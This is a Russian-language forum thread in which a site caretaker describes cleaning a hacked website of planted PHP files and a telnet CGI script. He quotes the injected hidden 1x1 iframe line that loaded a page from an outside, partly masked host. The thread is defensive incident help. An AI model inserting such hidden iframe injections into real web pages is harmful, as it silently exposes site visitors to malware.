-
Junior Member
- Вес репутации
- 62
Мой сайт заражён. Борьбу проигрываю. Прошу помощи
Проверил сегодня сайт, за которым меня попросил присмотреть приятель: _http://www.sochi-medved.ru/
Во время загрузки обращается к пяти сторонним узлам. Из каталога вычистил несколько файлов, которые появились несанкционированно - "arm.php", "1.php" и "ps.php". Закрыл все доступы. Снял права на запись со всех папок. В папке "cgi-bin" был скрипт "cgitelnet.pl" - удалил. Поменял пароли на панель управления и фтп-доступ. Но при загрузке по прежнему обращается к каким-то хакерским узлам. ФФ просто вылетает. Опера предлагает поставить "чистильщик реестра".
Хостер, незадолго до этого, сообщал о массовом воровстве паролей ФТП у него и просил всё поменять. Я это сделал. Но, видимо, опоздал. Мои компы чистые. ОСтальные сайты - полтора десятка - тоже чистые. Залезли через хостера - 100%.
Саппорт, в ответ на просьбу о помощи, написал: "Со своей стороны, можем удалить вставленные вирусом строчки из файлов (нужно указать пример строки которую нужно удалить из файлов)".
Что делать, подскажите? Где чистить? Спасибо.
-
Будь в курсе!
Будь в курсе!
Надоело быть жертвой? Стань профи по информационной безопасности, получай самую свежую информацию об угрозах и средствах защиты от ведущего российского аналитического центра Anti-Malware.ru:
-
Чистить - ваш компьютер.
Прочитайте здесь, а потом выполните правила.
-
-
Junior Member
- Вес репутации
- 62
Да, вот ещё что. Стартовую страницу "index.php" тоже почистил. В конце была строка:
Код:
echo "<iframe src='http://www.rad*ay.hr/forum/lang/inexed.htm' width=1 height=1></iframe>";
Не помогает. Снова появляется. БД нужно чистить?
Последний раз редактировалось Alex_Goodwin; 29.05.2007 в 05:54.
-
Junior Member
- Вес репутации
- 62
anton_dr
Всё это прочёл ещё до регистрации. Компьютер чистый. IE вообще не пользуюсь. Хищение паролей, причём массовое, произошло у хостера. Он об этом сам сообщал. Речь не о том. Где и что они ещё успели прописать? Сторонних файлов не осталось.
Конечно, можно снести движок, но у меня чисто спортивный интрес уже возник. Надо бы победить эту заразу. Если допустить, что БД испорчена - что искать в ней? Какие текстовые поля могут относиться к вирусу?
-
Может лучше остаться в какой-то одной теме, чем сразу в двух? Консультанты одни и те же...
P.S.: shinkareff создал такую же тему на форуме ЛК. Вот ссылка http://forum.kaspersky.com/index.php?showtopic=39219
-
-
Junior Member
- Вес репутации
- 62
Всё, победил. Главная подгружается ещё из папки "систем". Там два файла пришлось полечить - "login.php" и "index.php". Строчку в обоих убрал в конце. Спасибо.
MaXim, извините, не думал, что это зеркала. Паника, знаете ли, влияет на здравый смысл иногда.
-
Страшного ни чего нет, просто путаница возникает.
-
-
Сообщение от
shinkareff
MaXim, извините, не думал, что это зеркала. Паника, знаете ли, влияет на здравый смысл иногда.
Это не зеркала . Помогаем и там, и здесь.
Павел
AVZ HijackThis помощь с 10-00 до 18-00МСК
Windows7, SEP(work)
WindowsXP KIS(home)
На up не реагирую
-
-
-